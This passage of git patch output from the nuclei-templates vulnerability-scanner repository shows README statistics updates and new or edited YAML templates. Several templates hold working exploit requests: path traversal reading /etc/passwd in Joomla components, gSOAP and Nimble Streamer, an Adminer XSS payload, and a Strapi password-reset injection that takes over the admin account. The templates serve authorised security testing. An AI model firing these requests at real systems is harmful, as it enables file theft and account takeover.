244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | From 4c0691f09fc4881cacd23ff2324b2c8288c5b47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 4 Sep 2021 11:19:04 +0000 Subject: [PATCH 045/339] Auto Update README [Sat Sep 4 11:19:04 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index a447037293..5487e31afc 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | -**147 directories, 1989 files**. +**150 directories, 2015 files**. From b0900aacdb9bf2445254dd26b9024f26f57b5dbc Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 4 Sep 2021 14:29:07 -0500 Subject: [PATCH 046/339] Create ibm-security-access-manager.yaml --- .../ibm-security-access-manager.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/ibm-security-access-manager.yaml diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml new file mode 100644 index 0000000000..91e521e81c --- /dev/null +++ b/exposed-panels/ibm-security-access-manager.yaml @@ -0,0 +1,29 @@ +id: ibm-security-access-manager + +info: + name: Detects IBM Security Access Manager + description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. + reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "IBM Security Access Manager" + - "<h2>IBM Security" + - "<em>Access Manager" + condition: and + - type: word + part: header + words: + - "text/html" From ef9055b4f0169cab9875941759475668361e7d5d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 08:55:43 +0700 Subject: [PATCH 047/339] Create CVE-2010-1312.yaml --- cves/2010/CVE-2010-1312.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1312.yaml diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml new file mode 100644 index 0000000000..022a54afd8 --- /dev/null +++ b/cves/2010/CVE-2010-1312.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1312 + +info: + name: Joomla! Component News Portal 1.5.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12077 + - https://www.cvedetails.com/cve/CVE-2010-1312 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 06fba0c78d6f7da0a34e3891b54cb42758d629e0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 09:03:48 +0700 Subject: [PATCH 048/339] Create CVE-2010-1473.yaml --- cves/2010/CVE-2010-1473.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1473.yaml diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml new file mode 100644 index 0000000000..c2e7878067 --- /dev/null +++ b/cves/2010/CVE-2010-1473.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1473 + +info: + name: Joomla! Component Advertising 0.25 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12171 + - https://www.cvedetails.com/cve/CVE-2010-1473 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From e96b94242fa75b1eb76d49f0f4a77b097db6b747 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:07:47 +0900 Subject: [PATCH 049/339] Create gSOAP-LFl.yaml --- gSOAP-LFl.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 gSOAP-LFl.yaml diff --git a/gSOAP-LFl.yaml b/gSOAP-LFl.yaml new file mode 100644 index 0000000000..f7bd7c67e7 --- /dev/null +++ b/gSOAP-LFl.yaml @@ -0,0 +1,24 @@ +id: gsoap-lfi + +info: + name: gSOAP 2.8 - Directory Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47653 + tags: gsoap,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From f8e19ea1d258d60a5d4889e8afcb619801daf8e3 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:10:02 +0900 Subject: [PATCH 050/339] Create CVE-2019-11013.yaml --- CVE-2019-11013.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 CVE-2019-11013.yaml diff --git a/CVE-2019-11013.yaml b/CVE-2019-11013.yaml new file mode 100644 index 0000000000..680aabcde6 --- /dev/null +++ b/CVE-2019-11013.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-11013 + +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47301 + tags: cves,lfi,nimble + +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 062487f9e8288b80e8420acf0c5518e0bf8633d6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 17:12:40 +0700 Subject: [PATCH 051/339] Create CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-29625.yaml diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml new file mode 100644 index 0000000000..65318224ba --- /dev/null +++ b/cves/2021/CVE-2021-29625.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-29625 + +info: + name: Adminer reflected XSS via the table parameter + author: daffainfo + description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). + severity: medium + reference: + - https://sourceforge.net/p/adminer/bugs-and-features/797/ + - https://www.cvedetails.com/cve/CVE-2021-29625/ + tags: cve,cve2021,adminer,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "'><svg/onload=alert(document.cookie)>" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From 17d55f7a17cac495969d4e9c6350364b06d6aec3 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 15:51:47 +0530 Subject: [PATCH 052/339] misc update --- cves/2019/CVE-2019-18818.yaml | 29 +++++++++++++++++++---------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 01fceb5e82..bd28bef61f 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -1,19 +1,25 @@ id: CVE-2019-18818 info: - name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) + name: Strapi CMS - Admin password reset (Unauthenticated) author: idealphase description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 severity: critical - tags: cve,cve2019,strapi,rce + tags: cve,cve2019,strapi,auth-bypass,intrusive requests: - - method: GET - path: - - "{{BaseURL}}/admin/strapiVersion" + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} matchers-condition: and matchers: @@ -28,10 +34,13 @@ requests: - type: word words: - - "strapiVersion" + - '"username":' + - '"email":' + - '"jwt":' part: body - - type: word - words: - - '3.0.0-beta.17.4' - part: body + extractors: + - type: json + json: + - .user.username + - .user.email \ No newline at end of file From 7696f9ab3b0ad33fa4c84da4e77a380b00463a77 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 17:23:34 +0530 Subject: [PATCH 053/339] Added login panel detection --- strapi-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 strapi-panel.yaml diff --git a/strapi-panel.yaml b/strapi-panel.yaml new file mode 100644 index 0000000000..ff373e8e4f --- /dev/null +++ b/strapi-panel.yaml @@ -0,0 +1,23 @@ +id: strapi-panel + +info: + name: Strapi Login Panel + author: idealphase + severity: info + tags: panel,strapi + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/auth/login' + + matchers-condition: and + matchers: + + - type: word + words: + - "<title>Strapi Admin" + + - type: status + status: + - 200 \ No newline at end of file From 91a059cde71cbbb98b6e822a1f625c79c1c0ce93 Mon Sep 17 00:00:00 2001 From: kali Date: Sun, 5 Sep 2021 08:42:45 -0400 Subject: [PATCH 054/339] Updated via change location of strapi-panel.yaml to proper directory --- strapi-panel.yaml => exposed-panels/strapi-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename strapi-panel.yaml => exposed-panels/strapi-panel.yaml (100%) diff --git a/strapi-panel.yaml b/exposed-panels/strapi-panel.yaml similarity index 100% rename from strapi-panel.yaml rename to exposed-panels/strapi-panel.yaml From bf1d6374b23b379c17efd5034430b888464d46da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:22:07 +0530 Subject: [PATCH 055/339] Rename gSOAP-LFl.yaml to vulnerabilities/other/gsoap-lfi.yaml --- gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml (100%) diff --git a/gSOAP-LFl.yaml b/vulnerabilities/other/gsoap-lfi.yaml similarity index 100% rename from gSOAP-LFl.yaml rename to vulnerabilities/other/gsoap-lfi.yaml From d3a88548e5e368916e57a7e46a708a32206e96cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:23:17 +0530 Subject: [PATCH 056/339] Update and rename CVE-2019-11013.yaml to cves/2019/CVE-2019-11013.yaml --- CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml (94%) diff --git a/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml similarity index 94% rename from CVE-2019-11013.yaml rename to cves/2019/CVE-2019-11013.yaml index 680aabcde6..ba86250503 100644 --- a/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble + tags: cve,cve2019,lfi,nimble requests: - method: GET From 63ce5e0b7780513aaa76f238955b4bc27751a2fd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:52:45 +0530 Subject: [PATCH 057/339] Nextcloud templates --- misconfiguration/nextcloud-install.yaml | 28 +++++++++++++++++++++++++ technologies/nextcloud-detect.yaml | 24 +++++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 misconfiguration/nextcloud-install.yaml create mode 100644 technologies/nextcloud-detect.yaml diff --git a/misconfiguration/nextcloud-install.yaml b/misconfiguration/nextcloud-install.yaml new file mode 100644 index 0000000000..a2a87e7bf0 --- /dev/null +++ b/misconfiguration/nextcloud-install.yaml @@ -0,0 +1,28 @@ +id: nextcloud-install + +info: + name: Nextcloud Exposed Installation + author: skeltavik + severity: high + tags: tech,nextcloud,storage + reference: https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
Create an admin account' + - 'Storage & database' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml new file mode 100644 index 0000000000..9039bfb4a2 --- /dev/null +++ b/technologies/nextcloud-detect.yaml @@ -0,0 +1,24 @@ +id: nextcloud-detect + +info: + name: Nextcloud Detect + author: skeltavik + severity: info + description: Detects Nextcloud + tags: tech,nextcloud,storage + reference: https://nextcloud.com + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/nextcloud/index.php/login' + - '{{BaseURL}}/login' + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'var nc_lastLogin' From 513f9058f306f498ef4a3c0a3a445860f315a97e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:56:47 +0530 Subject: [PATCH 058/339] misc update Co-Authored-By: Bram Ruttens <3391681+skeltavik@users.noreply.github.com> --- technologies/nextcloud-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml index 9039bfb4a2..b46697fb61 100644 --- a/technologies/nextcloud-detect.yaml +++ b/technologies/nextcloud-detect.yaml @@ -12,9 +12,10 @@ requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/nextcloud/index.php/login' - '{{BaseURL}}/login' + - '{{BaseURL}}/nextcloud/index.php/login' + stop-at-first-match: true redirects: true max-redirects: 2 matchers: From ef1f7c5e92133362f6e59b96c491cc95ad0993d1 Mon Sep 17 00:00:00 2001 From: sullo Date: Sun, 5 Sep 2021 17:13:45 -0400 Subject: [PATCH 059/339] Updates across many templates for clarity, spelling, and grammar. --- cves/2009/CVE-2009-1151.yaml | 4 ++-- cves/2009/CVE-2009-4223.yaml | 2 +- cves/2013/CVE-2013-2251.yaml | 2 +- cves/2016/CVE-2016-5649.yaml | 4 ++-- cves/2017/CVE-2017-15715.yaml | 4 ++-- cves/2017/CVE-2017-18638.yaml | 2 +- cves/2019/CVE-2019-13462.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-5127.yaml | 2 +- cves/2019/CVE-2019-5418.yaml | 2 +- cves/2020/CVE-2020-11034.yaml | 2 +- cves/2020/CVE-2020-14883.yaml | 2 +- cves/2020/CVE-2020-25213.yaml | 4 ++-- cves/2020/CVE-2020-25540.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-28976.yaml | 2 +- cves/2020/CVE-2020-5847.yaml | 2 +- cves/2020/CVE-2020-7209.yaml | 2 +- cves/2020/CVE-2020-9402.yaml | 2 +- cves/2020/CVE-2020-9425.yaml | 2 +- cves/2021/CVE-2021-21972.yaml | 2 +- cves/2021/CVE-2021-28854.yaml | 2 +- cves/2021/CVE-2021-33221.yaml | 2 +- default-logins/glpi/glpi-default-credential.yaml | 2 +- dns/mx-service-detector.yaml | 2 +- exposures/files/yarn-lock.yaml | 2 +- fuzzing/iis-shortname.yaml | 2 +- iot/kevinlab-device-detect.yaml | 2 +- iot/xp-webcam.yaml | 4 ++-- miscellaneous/google-floc-disabled.yaml | 2 +- miscellaneous/joomla-htaccess.yaml | 4 ++-- miscellaneous/joomla-manifest-file.yaml | 4 ++-- miscellaneous/moodle-changelog.yaml | 2 +- misconfiguration/aem/aem-userinfo-servlet.yaml | 4 ++-- misconfiguration/exposed-service-now.yaml | 4 ++-- misconfiguration/http-missing-security-headers.yaml | 4 ++-- misconfiguration/laravel-debug-enabled.yaml | 4 ++-- network/deprecated-sshv1-detection.yaml | 2 +- network/mysql-native-cred-bruteforce.yaml | 2 +- network/openssh5.3-detect.yaml | 2 +- vulnerabilities/generic/open-redirect.yaml | 2 +- vulnerabilities/other/couchdb-adminparty.yaml | 2 +- vulnerabilities/other/eyelock-nano-lfd.yaml | 2 +- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- vulnerabilities/other/kevinlab-hems-backdoor.yaml | 4 ++-- vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- .../springboot/springboot-actuators-jolokia-xxe.yaml | 4 ++-- workflows/azkaban-workflow.yaml | 4 ++-- workflows/bigip-workflow.yaml | 4 ++-- workflows/lucee-workflow.yaml | 4 ++-- workflows/springboot-workflow.yaml | 6 +++--- workflows/worksite-takeover-workflow.yaml | 4 ++-- 55 files changed, 74 insertions(+), 74 deletions(-) diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index f52b3c3c1a..2837b0aa42 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -4,7 +4,7 @@ info: name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha severity: high - description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 @@ -33,4 +33,4 @@ requests: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml index 5b336af011..c28fd9c671 100644 --- a/cves/2009/CVE-2009-4223.yaml +++ b/cves/2009/CVE-2009-4223.yaml @@ -2,7 +2,7 @@ id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI - description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index e149113efa..d322c7908c 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation,dwisiswant0,alex severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html tags: cve,cve2013,rce,struts,apache diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 5fa539874d..2238126a04 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical - description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. + description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 @@ -32,4 +32,4 @@ requests: part: body group: 1 regex: - - 'Success "([a-z]+)"' \ No newline at end of file + - 'Success "([a-z]+)"' diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 78556fb50d..0677931936 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -3,7 +3,7 @@ id: CVE-2017-15715 info: name: Apache Arbitrary File Upload author: geeknik - description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. + description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload @@ -42,4 +42,4 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_2, "{{randstr_1}}")' diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index bf1abb9b15..fc7f16e8cc 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -4,7 +4,7 @@ info: name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high - description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. reference: - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html - https://github.com/graphite-project/graphite-web/issues/2008 diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 7ad030cba0..41c5e358b9 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml @@ -5,7 +5,7 @@ info: author: divya_mudgal severity: critical reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ - description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameter to the /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. + description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper requests: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index c04cf98e43..2229b3f142 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -4,7 +4,7 @@ info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr severity: high - description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability. + description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 0ee815a902..3478b09508 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -4,7 +4,7 @@ info: name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high - description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). + description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index f0951986e7..d283867419 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -4,7 +4,7 @@ 